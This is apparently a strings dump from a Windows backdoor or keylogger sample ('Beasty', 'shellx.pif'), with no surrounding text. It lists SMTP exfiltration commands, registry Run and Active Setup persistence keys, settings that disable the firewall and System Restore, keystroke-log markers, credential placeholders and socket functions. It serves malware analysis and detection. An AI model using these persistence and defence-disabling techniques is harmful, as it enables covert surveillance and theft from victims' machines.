TUDP
TMxQuery
TSMTP
...
ns1.ip-plus.net
...
HELO
MAIL FROM:<
RCPT TO:<
DATA
Subject:
QUIT
...
SHELLX.PIF
Beasty
SOFTWARE\Microsoft\Windows
\CurrentVersion
COM Service
msagent\
SOFTWARE\Microsoft\Active Setup\Installed Components\{42AC0312-EE51-A3CC-EA32-40AA12E6115C}
StubPath
\Run
COMMAND\
ProductName
CurrentBuildNumber
ProcessorNameString
Hardware\Description\System\CentralProcessor\0
sys.mss
sys.msx
Shell_TrayWnd
\shell\open\command
Explorer.exe
#.tty
SharedAccess
Start
SYSTEM\CurrentControlSet\Services\SharedAccess
NT\CurrentVersion\SystemRestore
DisableSR
.blf
************ Boot:[
...
^^^^^^^^^^^^ Shut Down:[
...
{UNDO}
{TAB}
{DEL}
...
*user*
*ip*
*port*
*pass*
...
~#1.bmp
...
shellx.pif
...
set cdaudio door open
set cdaudio door closed
...
WSACleanup
WSAStartup
WSAAsyncSelect
gethostname
gethostbyname
socket
shutdown
send
recv
listen
inet_ntoa
inet_addr
htons
htonl
connect
closesocket
bind
accept
...
server
pnglang
SysInit
System
pngzlib
WinSvc
KWindows
UTypes
TlHelp32
WinSock
3Messages
TEml
Funcz
pngimage
NMainUnit
$TTY